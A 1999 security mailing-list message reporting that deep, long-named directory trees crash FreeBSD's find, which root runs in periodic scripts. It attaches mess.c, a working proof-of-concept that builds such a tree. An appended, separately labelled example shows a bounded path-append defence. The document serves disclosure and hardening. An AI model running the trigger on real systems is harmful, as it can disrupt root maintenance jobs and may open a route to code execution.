Date: 04 May 1999 23:29:17 +0200
From: Dag-Erling Smorgrav <des@ifi.uio.no>
To: security@freebsd.org
Subject: [Przemyslaw Frasunek <venglin@LAGOON.FREEBSD.ORG.PL>] Re: Buffer overflow in ftpd and locate bug
Message-ID: <xzpvhe8ttg2.fsf@hrotti.ifi.uio.no>
------- Start of forwarded message -------
Message-ID: <19990502183800.1113.qmail@venglin.gadaczka.org>
Date: Sun, 2 May 1999 20:37:35 CEST
Reply-To: Przemyslaw Frasunek <venglin@LAGOON.FREEBSD.ORG.PL>
From: Przemyslaw Frasunek <venglin@LAGOON.FREEBSD.ORG.PL>
Subject: Re: Buffer overflow in ftpd and locate bug
To: BUGTRAQ@NETSPACE.ORG

> I had a problem with locate from findutils-4.1.24.rpm from Redhat-5.1.
> It segfaults if we have a huge directory at incoming ftp which was created
> by exploits for the ftpd realpath hole. My ftpd is patched. Those exploits,
> I think, should not scare me, but if updatedb puts that directory into the
> locate database then locate segfaults (getline.c, row 104, by gdb).
> I guess it can be used for running arbitrary commands if root runs locate.

I've noticed a similar problem with /usr/bin/find on FreeBSD. By creating a
_very_ long and deep directory structure it's possible to segfault
/usr/bin/find (it's also used in /etc/periodic scripts, which run as root).

Example: I'm creating a directory structure with 300 subdirectories, each
255 chars long (source in attachment; it's also possible to do it via ftpd,
because it calls mkdir() and chdir()).

lagoon:venglin:/tmp/jc> find example > /dev/null
Segmentation fault (core dumped)

Gdb shows that the function puts() was overflowed when it tried to print a
very long path. Other system tools (rm, ls) also have big problems with such
directory structures.

-- 
* Fido: 2:480/124 ** WWW: lagoon.freebsd.org.pl/~venglin ** GSM:48-601-383657 *
* Inet: venglin@lagoon.freebsd.org.pl ** PGP:D48684904685DF43EA93AFA13BE170BF *

---- File information -----------
     File:  mess.c
     Date:  2 May 1999, 19:01
     Size:  748 bytes.
     Type:  Text

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

#define DUMP 0x41       /* 'A': every directory name is a run of 255 'A's */

int main(int argc, char *argv[])
{
    char buf[256];      /* 255-byte name plus the terminating NUL */
    int i = 0;

    if (argc < 3) {
        fprintf(stderr, "usage: %s <dir> <depth>\n", argv[0]);
        exit(1);
    }
    if (chdir(argv[1])) {
        fprintf(stderr, "error in chdir(): %s\n", strerror(errno));
        exit(1);
    }
    memset(buf, DUMP, 255);
    buf[255] = '\0';
    /* descend <depth>-1 levels, creating one 255-char directory at each */
    for (i = 0; i < atoi(argv[2]) - 1; i++) {
        if (mkdir(buf, (S_IRWXU | S_IRWXG | S_IRWXO))) {
            fprintf(stderr, "error in mkdir() after %d iterations: %s\n",
                    i, strerror(errno));
            exit(1);
        }
        if (chdir(buf)) {
            fprintf(stderr, "error in chdir() after %d iterations: %s\n",
                    i, strerror(errno));
            exit(1);
        }
    }
    exit(0);
}

------- End of forwarded message -------
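The poster's diagnosis is that find overflowed while handling a path far longer than any single buffer; the defensive pattern is to bound every step that extends a pathname. As an added example, not code from the original message or from the FreeBSD or findutils sources, here is a path-append that fails with ENAMETOOLONG instead of writing past its buffer, exercised on the 300 x 255-character shape mess.c creates. PATH_MAX is taken from <limits.h>, with 1024 (FreeBSD's value) assumed if the header lacks it.

```c
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <string.h>

#ifndef PATH_MAX
#define PATH_MAX 1024   /* assumed (FreeBSD's value) if <limits.h> lacks it */
#endif

/* Append "/name" to the NUL-terminated path in dst (capacity cap).
 * Returns 0 on success; on overflow returns -1 with errno = ENAMETOOLONG
 * and leaves dst untouched. An unchecked strcat() at this point is the
 * pattern a 300 x 255-character tree turns into a buffer overflow. */
int path_append(char *dst, size_t cap, const char *name)
{
    size_t dlen = strlen(dst), nlen = strlen(name);
    if (dlen + nlen + 2 > cap) {        /* '/' + name + NUL must fit */
        errno = ENAMETOOLONG;
        return -1;
    }
    dst[dlen] = '/';
    memcpy(dst + dlen + 1, name, nlen + 1);
    return 0;
}

/* Simulate descending `depth` levels of `namelen`-character 'A' names (the
 * shape mess.c creates) below `root`, accumulating into a PATH_MAX buffer.
 * Returns how many levels fit before path_append() refuses: the point where
 * a walker must stop or switch to chdir()-relative names. */
int levels_that_fit(const char *root, int depth, size_t namelen)
{
    char path[PATH_MAX], name[256];     /* NAME_MAX on FreeBSD is 255 */
    int i;
    if (namelen > 255)
        namelen = 255;
    memset(name, 'A', namelen);
    name[namelen] = '\0';
    snprintf(path, sizeof path, "%s", root);
    for (i = 0; i < depth && path_append(path, sizeof path, name) == 0; i++)
        ;
    return i;
}

int main(void)
{
    printf("%d of 300 levels fit in PATH_MAX=%d; deeper ones are rejected\n",
           levels_that_fit("example", 300, 255), PATH_MAX);
    return 0;
}
```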